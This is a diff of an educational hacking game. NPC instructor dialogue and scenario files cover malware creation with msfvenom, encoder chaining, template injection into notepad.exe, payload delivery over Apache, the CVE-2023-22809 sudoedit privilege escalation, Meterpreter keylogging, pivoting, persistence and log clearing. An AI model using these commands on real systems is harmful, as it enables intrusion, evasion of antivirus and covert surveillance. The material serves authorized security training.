Suspicious patterns: Process creating multiple network connections, modification of system files, injection into other processes, encryption of large numbers of files (ransomware behavior), keylogging-like keyboard hooks, and persistence mechanisms (registry keys, startup folders).
Problem: legitimate software sometimes does these things too. Anti-cheat software for games triggers false positives constantly.
~ instructor_rapport += 10
#influence_increased
-> anomaly_based
* [Which is better?]
You: Which detection method is superior?
Both. Modern anti-malware uses layered approach.
Signature-based catches known threats efficiently. Anomaly-based catches unknowns.
Add heuristics, sandboxing, reputation scoring, machine learning - defense in depth.
No single method is perfect. Combine multiple for better coverage.
~ instructor_rapport += 10
#influence_increased
-> anomaly_based
* [Got it]
-> antimalware_detection
// ===========================================
// EVASION TECHNIQUES
// ===========================================
=== evasion_techniques ===
~ instructor_rapport += 5
#influence_increased
Evasion - making malware undetectable to anti-malware scanners.
Key techniques: encoding, obfuscation, template injection, packing, encryption.
Goal: change how malware looks without changing what it does.
* [Explain encoding]
You: How does encoding help evasion?
-> encoding_evasion
* [Explain template injection]
You: What's template injection?
-> template_injection
* [What's polymorphic malware?]
You: You mentioned polymorphic malware earlier?
Polymorphic malware - changes its appearance while maintaining functionality.
Stores payload in encoded/encrypted form. Includes decoder stub that unpacks it at runtime.
Each iteration looks different (different encoding, different decryptor), but does the same thing.
This is what msfvenom encoders create - polymorphic payloads.
~ instructor_rapport += 10
#influence_increased
-> evasion_techniques
* [Back to main menu]
-> malware_hub
=== encoding_evasion ===
~ instructor_rapport += 10
#influence_increased
Encoding for evasion - re-encode payload so file looks different but executes identically.
msfvenom supports multiple encoders. View list: `msfvenom -l encoders`
Common encoder: shikata_ga_nai (Japanese for "it can't be helped" - popular polymorphic encoder)
Usage:
`msfvenom -p windows/adduser USER=test PASS=pass123 -e x86/shikata_ga_nai -i 10 -f exe > encoded.exe`
`-e` specifies encoder, `-i` specifies iterations (encode 10 times)
* [Does more encoding help?]
You: Is 10 iterations better than 1?
Diminishing returns. More iterations makes different file, but modern scanners analyze behavior, not just signatures.
Encoding helps evade simple hash/signature checks. Won't help against heuristic or behavioral analysis.
5-10 iterations often sufficient for signature evasion. Beyond that, template injection more effective.
~ instructor_rapport += 8
#influence_increased
-> encoding_evasion
* [Can I chain encoders?]
You: Can I use multiple different encoders?
Absolutely. Pipe msfvenom outputs:
`msfvenom -p payload -e encoder1 -i 3` piped to `msfvenom -e encoder2 -i 5 -f exe > multi_encoded.exe`
Each encoder transforms output differently. Chaining increases obfuscation.
Though again, modern AV looks deeper than surface encoding.
~ instructor_rapport += 10
#influence_increased
-> encoding_evasion
* [Understood]
-> evasion_techniques
=== template_injection ===
~ instructor_rapport += 10
#influence_increased
Template injection - embedding payload inside legitimate executable.
Makes malware look like real software. Both malicious code AND original program execute.
msfvenom `-x` flag specifies template executable:
`msfvenom -p windows/exec CMD='net user /add hacker pass123' -x notepad.exe -f exe > my_notepad.exe`
Result: executable that opens Notepad (seems normal) while also adding user account (malicious).
* [Why is this effective?]
You: How does this evade detection?
Several reasons: File structure resembles legitimate program, contains real code from original program, signature scanners see legitimate program signatures too, and behavioral analysis sees expected behavior (Notepad opens) alongside malicious.
Not perfect, but more effective than bare encoded payload.
~ instructor_rapport += 10
#influence_increased
-> template_injection
* [What programs make good templates?]
You: Which programs should I use as templates?
Context-dependent. Match victim's expectations: Games for game-focused social engineering, utilities (calc.exe, notepad.exe) for general purpose, and industry-specific software for targeted attacks.
Smaller files better (less suspicious download size).
Legitimate signed programs add credibility.
~ instructor_rapport += 8
#influence_increased
-> template_injection
* [Can I combine encoding and templates?]
You: Can I use both techniques together?
Absolutely recommended. Encode first, then inject into template:
`msfvenom -p payload -e encoder -i 7` piped to `msfvenom -x template.exe -f exe > output.exe`
Layered evasion: encoding changes signature, template adds legitimacy.
In practice: well-encoded, template-injected payloads evade many scanners.
~ instructor_rapport += 10
#influence_increased
-> template_injection
* [Got it]
-> evasion_techniques
// ===========================================
// REMOTE ACCESS TROJANS
// ===========================================
=== rat_intro ===
~ instructor_rapport += 5
#influence_increased
Remote Access Trojans (RATs) - malware providing attacker with remote control of victim system.
Classic architecture: client-server model. Server (victim runs this): listens for connections, executes commands. Client (attacker uses this): connects to server, sends commands.
RAT capabilities typically include: remote shell, file transfer, screenshot capture, keylogging, webcam access, process manipulation.
* [How do RATs differ from what we've done?]
You: How is this different from adduser payload?
adduser is single-action. Runs once, adds user, exits.
RAT provides persistent, interactive access. Attacker can issue multiple commands over time.
More powerful, more flexible, more risk if detected.
~ instructor_rapport += 8
#influence_increased
-> rat_intro
* [What Metasploit payloads create RATs?]
You: Which payloads provide remote access?
Several options: windows/meterpreter/reverse_tcp (full-featured RAT), windows/shell/reverse_tcp (simple command shell), and windows/vnc/reverse_tcp (graphical remote access).
Meterpreter is most powerful - extensive post-exploitation features.
Reverse shells covered in later labs. Advanced topic.
~ instructor_rapport += 8
#influence_increased
-> rat_intro
* [Why "reverse"?]
You: What does "reverse" mean in reverse_tcp?
Normal: attacker connects TO victim (requires open port on victim, often firewalled).
Reverse: victim connects TO attacker (outbound connections usually allowed).
Victim initiates connection, attacker listens. Bypasses most firewalls.
Essential technique for real-world scenarios where victims are behind NAT/firewalls.
~ instructor_rapport += 10
#influence_increased
-> rat_intro
* [Understood]
-> malware_hub
// ===========================================
// COMMANDS REFERENCE
// ===========================================
=== commands_reference ===
Quick reference for Metasploit and malware-related commands:
msfvenom basics:
- List payloads: `msfvenom -l payloads`
- List encoders: `msfvenom -l encoders`
- List formats: `msfvenom -l formats`
- Show options: `msfvenom -p payload_name --list-options`
Creating payloads:
- Basic: `msfvenom -p windows/adduser USER=name PASS=pass -f exe > trojan.exe`
- Encoded: `msfvenom -p payload -e x86/shikata_ga_nai -i 10 -f exe > output.exe`
- With template: `msfvenom -p payload -x template.exe -f exe > output.exe`
- Combined: `msfvenom -p payload -e encoder -i 5` piped to `msfvenom -x template.exe -f exe > final.exe`
Testing payloads:
- Hash file: `sha256sum filename.exe`
- Scan with ClamAV: `clamscan`
- Scan specific file: `clamscan filename.exe`
Web server (payload delivery):
- Create share directory: `sudo mkdir /var/www/html/share`
- Copy payload: `sudo cp malware.exe /var/www/html/share/`
- Start Apache: `sudo service apache2 start`
- Access from victim: http://KALI_IP/share/malware.exe
Windows victim verification:
- List users: `net user`
- Check specific user: `net user username`
+ [Back to main menu]
-> malware_hub
// ===========================================
// CHALLENGE TIPS
// ===========================================
=== challenge_tips ===
Practical tips for lab challenges:
Creating effective Trojans:
- Start simple (windows/adduser or windows/exec)
- Test unencoded version first to ensure payload works
- Then add encoding, check if detection increases
- Finally try template injection for best evasion
Evasion tips:
- Experiment with different encoders and iteration counts
- Shikata_ga_nai is popular but widely signatured - try others
- Chain multiple encoders for better results
- Use legitimate programs as templates (notepad, calc, small utilities)
- Test against ClamAV before trying against victim
- Don't upload to VirusTotal if you want evasion to last (shares sample with AV vendors)
Delivery tips:
- Make filename convincing (game.exe, important_document.exe, update.exe)
- Social engineering matters - victim needs reason to run it
- In real scenarios: icons, file properties, code signing all add legitimacy
- For lab: simple web delivery works fine
Verification:
- Windows: `net user` shows created accounts
- Check Admin group: `net localgroup administrators`
- If payload fails, check syntax and password complexity requirements
- Passwords need: uppercase, lowercase, numbers (e.g., SecurePass123)
Troubleshooting:
- Payload doesn't work? Test simpler version without encoding
- Still detected by AV? Try different template or more encoding iterations
- Apache won't start? `sudo service apache2 status` for error info
- Can't download from Kali? Check IP address (`ip a`) and firewall rules
{instructor_rapport >= 50:
You've engaged deeply with the material and asked excellent questions. You're well-prepared for the practical exercises.
}
+ [Back to main menu]
-> malware_hub
// ===========================================
// READY FOR PRACTICE
// ===========================================
=== ready_for_practice ===
Good. You've covered the core concepts.
Lab objectives:
1. Create basic Trojan using msfvenom
2. Test against anti-malware (ClamAV)
3. Use encoding to evade detection
4. Inject payload into legitimate program template
5. Deliver via web server to Windows victim
6. Verify successful exploitation
{ethical_awareness >= 10:
You've demonstrated solid ethical awareness. Remember: controlled lab environment, authorized testing only.
}
The skills you're learning are powerful. Metasploit is used by professional penetration testers worldwide.
But also by criminals. The difference is authorization and intent.
You're learning these techniques to defend against them - to understand attacker methods, test organizational defenses, and improve security posture.
One final reminder: creating or deploying malware against unauthorized systems is computer fraud. Felony-level crime. Only use these skills in authorized contexts: penetration testing contracts, security research, education labs, your own isolated systems.
Now go create some Trojans. Good luck, Agent {player_name}.
#exit_conversation
-> malware_hub

1
scenarios/lab_malware_metasploit/ink/instructor.json Normal file
View File

File diff suppressed because one or more lines are too long

30
scenarios/lab_malware_metasploit/mission.json Normal file
View File

@@ -0,0 +1,30 @@
{
"display_name": "Malware and an Introduction to Metasploit and Payloads",
"description": "Dive into the world of malware and ethical hacking, exploring how attackers create and deploy malicious software to compromise computer systems. Learn about various types of malware, such as Trojan horses, viruses, and worms, and get acquainted with the powerful Metasploit framework for generating malicious payloads.",
"difficulty_level": 1,
"secgen_scenario": "labs/introducing_attacks/2_malware_msf_payloads.xml",
"collection": "vm_labs",
"cybok": [
{
"ka": "MAT",
"topic": "Malware Taxonomy",
"keywords": ["dimensions", "kinds"]
},
{
"ka": "MAT",
"topic": "Malware Analysis",
"keywords": ["anti-analysis and evasion techniques"]
},
{
"ka": "MAT",
"topic": "Attacks and exploitation",
"keywords": ["EXPLOITATION FRAMEWORKS"]
},
{
"ka": "SOIM",
"topic": "PENETRATION TESTING",
"keywords": ["PENETRATION TESTING - SOFTWARE TOOLS", "PENETRATION TESTING - ACTIVE PENETRATION"]
}
]
}

136
scenarios/lab_malware_metasploit/scenario.json.erb Normal file
View File

@@ -0,0 +1,136 @@
{
"scenario_brief": "Welcome to the Malware and Metasploit Lab! Your Malware Specialist instructor will guide you through malware types, the Metasploit Framework, payload generation, and evasion techniques. Complete the instruction and then practice your skills in the VM lab environment.",
"endGoal": "Complete the lab instruction with the Malware Specialist instructor and practice creating Trojans, testing against anti-malware, and using evasion techniques in the VM lab environment.",
"startRoom": "instruction_room",
"startItemsInInventory": [],
"globalVariables": {
"player_name": "Agent 0x00",
"lab_instruction_complete": false,
"vm_launched": false,
"instructor_rapport": 0,
"ethical_awareness": 0
},
"objectives": [
{
"aimId": "complete_instruction",
"title": "Complete Lab Instruction",
"description": "Learn about malware types, Metasploit Framework, and payload generation",
"status": "active",
"order": 0,
"tasks": [
{
"taskId": "complete_instruction_task",
"title": "Complete instruction with the Malware Specialist",
"type": "npc_conversation",
"targetNPC": "malware_specialist",
"status": "active"
}
]
}
],
"player": {
"id": "player",
"displayName": "Agent 0x00",
"spriteSheet": "hacker",
"spriteTalk": "assets/characters/hacker-talk.png",
"spriteConfig": {
"idleFrameStart": 20,
"idleFrameEnd": 23
}
},
"rooms": {
"instruction_room": {
"type": "room_office",
"connections": {
"north": "vm_lab_room"
},
"locked": false,
"npcs": [
{
"id": "malware_specialist",
"displayName": "Malware Specialist",
"npcType": "person",
"position": { "x": 3.5, "y": 3.5 },
"spriteSheet": "hacker-red",
"spriteTalk": "assets/characters/hacker-red-talk.png",
"spriteConfig": {
"idleFrameStart": 20,
"idleFrameEnd": 23
},
"storyPath": "scenarios/lab_malware_metasploit/ink/instructor.json",
"currentKnot": "start",
"timedConversation": {
"delay": 5000,
"targetKnot": "intro_timed"
},
"eventMappings": [],
"itemsHeld": []
}
],
"objects": [
{
"type": "lab-workstation",
"id": "lab_workstation",
"name": "Lab Sheet Workstation",
"takeable": true,
"labUrl": "https://cliffe.github.io/HacktivityLabSheets/labs/introducing_attacks/2-malware-msf-payloads/",
"observations": "A workstation for accessing the lab sheet with detailed instructions and exercises"
},
{
"type": "notes",
"name": "Lab Welcome Guide",
"takeable": true,
"readable": true,
"text": "Welcome to the Malware and Metasploit Lab!\n\nOBJECTIVES:\n1. Use the Lab Sheet Workstation to access detailed lab instructions\n2. Complete the lab sheet exercises\n3. Launch the VMs and practice malware creation techniques\n4. Learn about Metasploit Framework and payload generation\n\nThe Malware Specialist instructor is available if you need guidance.\n\nGood luck!",
"observations": "A guide to the lab structure and objectives"
},
{
"type": "notes",
"name": "VM Lab Instructions",
"takeable": true,
"readable": true,
"text": "VM Lab Practice Instructions:\n\n1. Launch the VMs in the VM Lab Room:\n - Kali VM Terminal: Your attacker machine with Metasploit Framework\n - Windows Victim Terminal: Target system for malware testing\n\n2. Your objectives:\n - Create basic Trojans using msfvenom\n - Test payloads against anti-malware (ClamAV)\n - Use encoding to evade detection\n - Inject payloads into legitimate program templates\n - Deliver payloads via web server to Windows victim\n - Verify successful exploitation\n\n3. Remember what the instructor taught you about malware types, Metasploit, and evasion techniques!\n\n4. Ethical reminder: Only use these techniques in authorized lab environments.",
"observations": "Instructions for the VM lab exercises"
}
]
},
"vm_lab_room": {
"type": "room_office",
"connections": {
"south": "instruction_room"
},
"locked": false,
"objects": [
{
"type": "vm-launcher",
"id": "vm_launcher_kali",
"name": "Kali VM Terminal",
"takeable": false,
"observations": "Terminal providing access to the Kali Linux attacker machine with Metasploit Framework",
"hacktivityMode": <%= vm_context && vm_context['hacktivity_mode'] ? 'true' : 'false' %>,
"vm": <%= vm_object('malware_metasploit', {
"id": 1,
"title": "kali",
"ip": "172.16.0.3",
"enable_console": true
}) %>
},
{
"type": "vm-launcher",
"id": "vm_launcher_windows_victim",
"name": "Windows Victim Terminal",
"takeable": false,
"observations": "Terminal providing access to the Windows victim system for malware testing practice",
"hacktivityMode": <%= vm_context && vm_context['hacktivity_mode'] ? 'true' : 'false' %>,
"vm": <%= vm_object('malware_metasploit', {
"id": 2,
"title": "windows_victim",
"ip": "172.16.0.2",
"enable_console": true
}) %>
}
]
}
}
}

997
scenarios/lab_post_exploitation/ink/instructor.ink Normal file
View File

@@ -0,0 +1,997 @@
// ===========================================
// POST-EXPLOITATION LAB
// Post-exploitation
// ===========================================
// Game-Based Learning replacement for lab sheet
// Original: introducing_attacks/7_post-exploitation.md
// Based on HacktivityLabSheets: introducing_attacks/7_post-exploitation.md
// Author: Z. Cliffe Schreuders, Anatoliy Gorbenko, Thalita Vergilio
// License: CC BY-SA 4.0
// ===========================================
// Global persistent state
VAR instructor_rapport = 0
VAR post_exploit_mastery = 0
// Global variables (synced from scenario.json.erb)
VAR player_name = "Agent 0x00"
// ===========================================
// ENTRY POINT
// ===========================================
=== start ===
~ instructor_rapport = 0
~ post_exploit_mastery = 0
Welcome back, {player_name}. What would you like to discuss?
-> post_exploit_hub
// ===========================================
// TIMED INTRO CONVERSATION (Game Start)
// ===========================================
=== intro_timed ===
~ instructor_rapport = 0
~ post_exploit_mastery = 0
Welcome to Post-Exploitation, {player_name}. I'm your advanced tactics instructor for this session.
Post-exploitation is what happens after you gain initial access. It's about leveraging that foothold to gather information, escalate privileges, and achieve your objectives. Once an attacker has compromised a system, they can misuse the privileges they've appropriated to take further actions - or go on to compromise other connected systems.
This lab completes the attack lifecycle - from initial exploitation through privilege escalation, information gathering, and pivoting to other systems.
Remember: these are powerful techniques for authorized penetration testing and defensive security only.
~ post_exploit_mastery += 10
#influence_increased
Let me explain how this lab works. You'll find three key resources here:
First, there's a Lab Sheet Workstation in this room. This gives you access to detailed written instructions and exercises that complement our conversation. Use it to follow along with the material.
Second, in the VM lab room to the north, you'll find terminals to launch virtual machines. You'll work with a Kali Linux attacker machine, a Windows server, and a Linux server for hands-on post-exploitation practice.
Finally, there's a Flag Submission Terminal where you'll submit flags you capture during the exercises. These flags demonstrate that you've successfully completed the challenges.
You can talk to me anytime to explore post-exploitation concepts, get tips, or ask questions about the material. I'm here to help guide your learning.
Ready to get started? Feel free to ask me about any topic, or head to the lab sheet workstation and VM room when you're ready to begin the practical exercises.
-> post_exploit_hub
=== post_exploit_hub ===
What aspect of post-exploitation would you like to explore?
+ [What is post-exploitation?]
-> post_exploit_intro
+ [Understanding shell access]
-> shell_access
+ [Assessing your level of access]
-> assessing_access
+ [Post-exploitation information gathering]
-> info_gathering
+ [Privilege escalation techniques]
-> privilege_escalation
+ [Using the sudo vulnerability (CVE-2023-22809)]
-> sudo_vulnerability
+ [Metasploit post-exploitation modules]
-> msf_post_modules
+ [Introduction to Meterpreter]
-> meterpreter_intro
+ [Meterpreter spyware features]
-> meterpreter_spyware
+ [Pivoting and port forwarding]
-> pivoting
+ [Maintaining access and covering tracks]
-> persistence_evasion
+ [Show me the commands reference]
-> commands_reference
+ [Practical challenge tips]
-> challenge_tips
+ [I'm ready for the lab exercises]
-> ready_for_practice
+ [That's all for now]
#exit_conversation
-> post_exploit_hub
=== post_exploit_intro ===
Post-exploitation is everything that happens after you successfully compromise a system.
~ instructor_rapport += 5
#influence_increased
The initial exploit gives you a foothold - usually limited access as whatever user account the vulnerable software was running as.
From there, you need to: understand what level of access you have, gather information about the system, escalate privileges if possible, collect sensitive data, maintain access, and potentially pivot to other systems.
+ [Why not just stop after getting shell access?]
Initial access is often limited. You might be running as a low-privilege user, not an administrator.
You need to understand the system, find sensitive data, escalate to higher privileges, and ensure you can maintain access.
In a real penetration test, you're demonstrating impact - showing what an attacker could actually DO with that access.
That means accessing sensitive files, dumping credentials, and potentially moving laterally to other systems.
~ instructor_rapport += 5
#influence_increased
+ [What determines what you can do post-exploitation?]
Several factors determine your capabilities:
First, the type of payload you used. A simple shell gives you command execution. Meterpreter gives you advanced features.
Second, the security context - what user account is the vulnerable software running as?
Third, the access controls in place. Are there additional restrictions beyond standard user permissions?
Finally, your skill at the command line and understanding of the operating system.
~ instructor_rapport += 5
#influence_increased
- -> post_exploit_hub
=== shell_access ===
Shell access means you have access to a command line interface on the target system.
~ instructor_rapport += 5
#influence_increased
On Windows, this is typically a Command Prompt or PowerShell. On Unix/Linux systems, it's usually a Bash shell.
Sometimes you'll see a familiar prompt. Other times you won't see any prompt at all, but you can still type commands and see output.
+ [What can I do with shell access?]
With shell access, you can run almost any command-line program available on the system.
You can list files, read documents, run scripts, check system information, create new files, and much more.
However, you're limited by the permissions of whatever user account you're running as.
If you're a normal user, you can't access administrator-only files or install system-wide software.
~ instructor_rapport += 5
#influence_increased
+ [What commands should I avoid?]
Avoid interactive programs that expect keyboard input and draw to the screen.
For example, on Linux use "cat" instead of "less", because less expects you to scroll and press 'q' to quit.
Avoid programs that run continuously until stopped, like "ping" without a count limit.
Also be careful with Ctrl-C - it will likely kill your shell connection rather than just the current command.
~ instructor_rapport += 5
#influence_increased
+ [What's the difference between shells on Windows and Linux?]
Windows shells typically use backslashes in paths (C:\\Users\\), while Linux uses forward slashes (/home/).
Common Windows commands: dir, type, net user, whoami, ipconfig
Common Linux commands: ls, cat, whoami, id, ifconfig (or ip a)
The privilege model is different too - Windows has Administrator/System, Linux has root (UID 0).
~ instructor_rapport += 5
#influence_increased
- -> post_exploit_hub
=== assessing_access ===
The first question after exploitation is: what level of access do I have?
~ instructor_rapport += 5
#influence_increased
You need to determine what user account you're running as and what privileges that account has.
On Windows, you might have Administrator, System, or a regular user account. On Linux, you want to know if you're root (UID 0) or a normal user.
+ [How do I check my access level on Linux?]
Use these commands to assess your Linux access:
whoami - Shows your username
id - Shows your user ID (UID), group ID (GID), and groups
id -u - Shows just the UID. A UID of 0 means you're root!
Any other UID means you're a normal user with standard access controls applying.
~ instructor_rapport += 5
#influence_increased
+ [How do I check my access level on Windows?]
On Windows, you can use:
whoami - Shows your username and domain
whoami /priv - Shows your privileges
net user USERNAME - Shows details about a user account
If you have Meterpreter: getuid and getprivs give detailed privilege information.
~ instructor_rapport += 5
#influence_increased
+ [What if I don't have root or Administrator access?]
That's very common! Most services run as unprivileged users for security reasons.
You can still access files that user can read, which might include sensitive data.
You can gather system information to look for privilege escalation opportunities.
On Linux, try accessing /etc/shadow - if you can't, that confirms you're not root.
Then you'll want to look for privilege escalation vulnerabilities.
~ instructor_rapport += 5
#influence_increased
- -> post_exploit_hub
=== info_gathering ===
Information gathering continues even after exploitation. Understanding the system helps you plan your next moves.
~ instructor_rapport += 5
#influence_increased
You want to learn about the operating system, installed software, network configuration, running processes, and other users.
+ [What system information should I gather on Linux?]
Key commands for Linux information gathering:
uname -a (kernel version and architecture)
cat /proc/cpuinfo (CPU details)
free -h (memory usage)
df -h (disk usage and partitions)
env (environment variables)
cat /etc/passwd (list of user accounts)
This information helps you understand the target and identify potential attack vectors.
~ instructor_rapport += 5
#influence_increased
+ [Why check the sudo version?]
The sudo command allows users to run commands with elevated privileges.
Check the version with: sudo --version
Certain versions of sudo have critical security vulnerabilities that allow privilege escalation!
For example, CVE-2023-22809 affects sudo versions 1.8.0 through 1.9.12p1.
Finding a vulnerable sudo version is a goldmine for privilege escalation.
~ instructor_rapport += 5
#influence_increased
+ [What network information is useful?]
Network information reveals what other systems you might be able to reach:
ifconfig or ip a (network interfaces and IP addresses)
netstat -an or ss -an (active connections and listening ports)
route or ip route (routing table)
cat /etc/resolv.conf (DNS configuration)
This helps you identify other systems to pivot to or internal networks to explore.
~ instructor_rapport += 5
#influence_increased
- -> post_exploit_hub
=== privilege_escalation ===
Privilege escalation means gaining additional privileges you weren't intentionally granted.
~ instructor_rapport += 5
#influence_increased
Vertical privilege escalation is going from normal user to administrator/root. Horizontal privilege escalation is accessing resources of another user at the same privilege level.
Privilege escalation exploits vulnerabilities in the kernel, system software, or misconfigurations.
+ [What are common privilege escalation vectors?]
Common privilege escalation opportunities include:
Vulnerable kernel versions with known local exploits
Vulnerable system software like sudo, polkit, or services
Misconfigured SUID binaries on Linux
Weak file permissions on sensitive files
Scheduled tasks running as administrators
Credentials stored in plaintext or easily crackable formats
~ instructor_rapport += 5
#influence_increased
+ [How do I find privilege escalation opportunities?]
Systematic enumeration is key:
Check kernel and software versions against CVE databases
Look for SUID binaries: find / -perm -4000 2>/dev/null
Check sudo permissions: sudo -l
Look for world-writable files in sensitive directories
Check for credentials in config files, bash history, and environment variables
~ instructor_rapport += 5
#influence_increased
+ [Tell me about the sudo vulnerability]
-> sudo_vulnerability
- -> post_exploit_hub
=== sudo_vulnerability ===
CVE-2023-22809 is a critical sudo vulnerability affecting versions 1.8.0 through 1.9.12p1.
~ instructor_rapport += 5
#influence_increased
The vulnerability is in sudoedit, which allows editing files with elevated privileges.
By manipulating environment variables, you can trick sudoedit into opening files you shouldn't have access to.
+ [How does this vulnerability work?]
The vulnerability exploits how sudoedit processes the EDITOR environment variable.
Normally, sudoedit restricts which files you can edit. But a coding mistake means you can use "--" to specify additional files.
For example: EDITOR='cat -- /etc/shadow' sudoedit /etc/hosts
This tells sudoedit to use "cat" as the editor and tricks it into opening /etc/shadow with root privileges!
The /etc/hosts file is just a decoy to satisfy sudoedit's normal operation.
~ instructor_rapport += 5
#influence_increased
+ [How can I use this to escalate privileges?]
First, you can read sensitive files: EDITOR='cat -- /etc/shadow' sudoedit /etc/hosts
This gives you password hashes which you might crack offline.
More powerfully, you can edit the sudoers file: EDITOR='vim -- /etc/sudoers' sudoedit /etc/hosts
Add a line like: distccd ALL=(ALL) NOPASSWD:ALL
This allows your user to run any command as root without a password: sudo -i
Now you're root!
~ instructor_rapport += 5
#influence_increased
+ [What's tricky about exploiting this?]
The challenge is that your simple shell doesn't support full interactive programs well.
When you use vim to edit /etc/sudoers, the display will be distorted and arrow keys won't work properly.
You need to carefully use vim commands without visual feedback:
"G" then "o" to go to bottom and insert new line, type your new line, "Esc" then ":x" to save.
Be very careful - if you corrupt /etc/sudoers, you'll break the VM!
~ instructor_rapport += 5
#influence_increased
- -> post_exploit_hub
=== msf_post_modules ===
Metasploit has numerous post-exploitation modules for automated information gathering and attacks.
~ instructor_rapport += 5
#influence_increased
These modules run against established sessions to collect data, escalate privileges, or set up persistence.
They're categorized by operating system and function: gather, escalate, manage, recon, and more.
+ [How do I use post-exploitation modules?]
First, you need an active session. Background it with Ctrl-Z.
Check your session ID: sessions
Select a post module: use post/linux/gather/checkvm
Set the session: setg SESSION 1 (or your session ID)
Using "setg" sets it globally, so you don't have to set it for each module.
Run the module: exploit (or run)
~ instructor_rapport += 5
#influence_increased
+ [What useful post-exploitation modules exist?]
For Linux targets, valuable modules include:
post/linux/gather/checkvm - Detect if running in a VM
post/linux/gather/enum_configs - Download config files
post/linux/gather/enum_network - Network configuration
post/linux/gather/enum_system - System and software information
post/linux/gather/enum_users_history - Command history and logs
post/linux/gather/hashdump - Dump password hashes
~ instructor_rapport += 5
#influence_increased
+ [Where does collected information get stored?]
Post-exploitation modules store collected data as "loot" in Metasploit's database.
The module output tells you where files are saved, usually in ~/.msf4/loot/
You can view loot with: loot
Files are timestamped and categorized, making it easy to review later for report writing.
~ instructor_rapport += 5
#influence_increased
- -> post_exploit_hub
=== meterpreter_intro ===
Meterpreter is an advanced payload originally developed by Matt Miller (Skape).
~ instructor_rapport += 5
#influence_increased
Unlike a simple shell, Meterpreter provides a sophisticated remote administration framework with many built-in features.
It's dynamically extensible - features can be loaded as needed. By default, it encrypts all communications.
+ [What makes Meterpreter special?]
Meterpreter has numerous advantages over basic shells:
Runs entirely in memory - doesn't write to disk, making forensics harder
Encrypted communications by default
Rich command set for file browsing, process manipulation, network operations
Can migrate between processes to hide or achieve persistence
Extensible with post-exploitation modules
Includes "spyware" features like keylogging and screen capture
~ instructor_rapport += 5
#influence_increased
+ [How do I use Meterpreter commands?]
Start by viewing available commands: help
Get current privileges: getuid and getprivs
Browse files: ls c:/ (Windows) or ls / (Linux)
Download files: download /path/to/file
Upload files: upload /local/file /remote/file
View processes: ps
Migrate to another process: migrate PID
Drop to a system shell: shell (Ctrl-D to return to Meterpreter)
~ instructor_rapport += 5
#influence_increased
+ [How does Meterpreter avoid detection?]
Meterpreter is designed for stealth:
It stays in memory and doesn't write files to disk (fileless malware)
By default it masquerades as "svchost.exe" on Windows, a common legitimate process
It can migrate into other running processes, making it hard to identify
Communications are encrypted, making network monitoring less effective
However, modern endpoint detection systems can still identify Meterpreter through behavioral analysis.
~ instructor_rapport += 5
#influence_increased
- -> post_exploit_hub
=== meterpreter_spyware ===
Meterpreter includes features typically associated with spyware - monitoring user activity without their knowledge.
~ instructor_rapport += 5
#influence_increased
These features can capture keystrokes, screenshots, and even webcam feeds.
While concerning for privacy, they're useful for security testing to demonstrate the risk of compromise.
+ [How does keylogging work in Meterpreter?]
Meterpreter can capture all keystrokes on the target system.
In Armitage: Right-click target → Meterpreter → Explore → Log Keystrokes
Set CAPTURE_TYPE to "winlogon" to capture login attempts
Via command line: keyscan_start (then keyscan_dump to view results)
This captures everything typed - passwords, emails, documents, searches.
~ instructor_rapport += 5
#influence_increased
+ [How do I capture screenshots?]
Screenshots show what the user is viewing:
screenshot - Captures current screen
The image is downloaded to your Kali system and automatically opened
This can reveal sensitive documents, credentials, or user behavior
In Armitage, there are menu options for screen capture in the Meterpreter menu.
~ instructor_rapport += 5
#influence_increased
+ [Can I get full graphical control?]
Yes! You can use VNC for full graphical remote control:
In Armitage: Right-click target → Meterpreter → Interact → Desktop (VNC)
Armitage starts a VNC server on the target and tells you the port
Connect with: vncviewer 127.0.0.1:PORT
You'll see and control the target's desktop just like sitting at their keyboard!
This is powerful but obvious to any user who's watching their screen.
~ instructor_rapport += 5
#influence_increased
- -> post_exploit_hub
=== pivoting ===
Pivoting means using a compromised system as a stepping stone to attack other systems.
~ instructor_rapport += 5
#influence_increased
Often attackers can't directly reach internal systems - firewalls, NAT, and network segmentation block direct access.
But if you compromise a system that CAN reach those internal systems, you can route your attacks through it.
+ [Why would I need to pivot?]
Several scenarios require pivoting:
Attacking internal systems from a compromised public-facing server
Accessing networks behind firewalls or NAT
Moving laterally through a corporate network
Hiding your true origin by routing through multiple compromised hosts
In real penetration tests, you often start from a DMZ server and need to pivot to reach critical internal systems.
~ instructor_rapport += 5
#influence_increased
+ [How does Meterpreter pivoting work?]
Meterpreter can set up routing so all your attacks go through a compromised host.
In Armitage: Right-click compromised host → Meterpreter → Pivoting → Setup → Add Pivot
Via command line, you use the "route" command in msfconsole
Once configured, any Metasploit attacks you launch will be routed through that system
The pivoted attacks will appear to come from the compromised system, not your Kali VM.
~ instructor_rapport += 5
#influence_increased
+ [What's port forwarding?]
Port forwarding is a simpler form of pivoting.
You instruct a compromised system to listen on a port and forward connections to a different host and port.
For example, forward local port 8080 to an internal web server on 10.0.0.5:80
This makes the internal service accessible through the compromised system.
Meterpreter's portfwd command handles this: portfwd add -l 8080 -p 80 -r 10.0.0.5
~ instructor_rapport += 5
#influence_increased
- -> post_exploit_hub
=== persistence_evasion ===
Maintaining access and covering tracks are advanced post-exploitation techniques.
~ instructor_rapport += 5
#influence_increased
Persistence means ensuring you can regain access even if the system reboots or the service is restarted.
Covering tracks means removing evidence of the attack from logs and the filesystem.
+ [How do attackers maintain access?]
Common persistence mechanisms include:
Creating new user accounts with administrative privileges
Installing backdoors that run on boot (services, scheduled tasks, startup scripts)
Modifying SSH authorized_keys to allow your key
Installing rootkits that hide processes and files
Meterpreter has post-exploitation modules specifically for persistence.
~ instructor_rapport += 5
#influence_increased
+ [How do you cover your tracks?]
Covering tracks involves removing or modifying evidence:
Clearing log files (on Linux: /var/log/auth.log, /var/log/syslog, etc.)
Clearing command history (bash history, PowerShell history)
Removing uploaded tools and malware
Modifying file timestamps to match surrounding files
However, sophisticated forensics can often detect these modifications.
~ instructor_rapport += 5
#influence_increased
+ [Does Meterpreter have anti-forensics features?]
Yes, Meterpreter is designed with anti-forensics in mind:
It runs in memory without writing to disk (fileless)
It can migrate between processes, making it hard to find
Communications are encrypted
There are modules to clear event logs: clearev
However, modern endpoint detection and response (EDR) tools can detect Meterpreter through behavioral analysis.
~ instructor_rapport += 5
#influence_increased
- -> post_exploit_hub
=== commands_reference ===
Let me provide a comprehensive post-exploitation commands reference.
~ instructor_rapport += 5
#influence_increased
**Initial Exploitation (Distcc example):**
nmap -p 1-65535 TARGET (scan all ports)
msfconsole
search distccd
use exploit/unix/misc/distcc_exec
set RHOST TARGET_IP
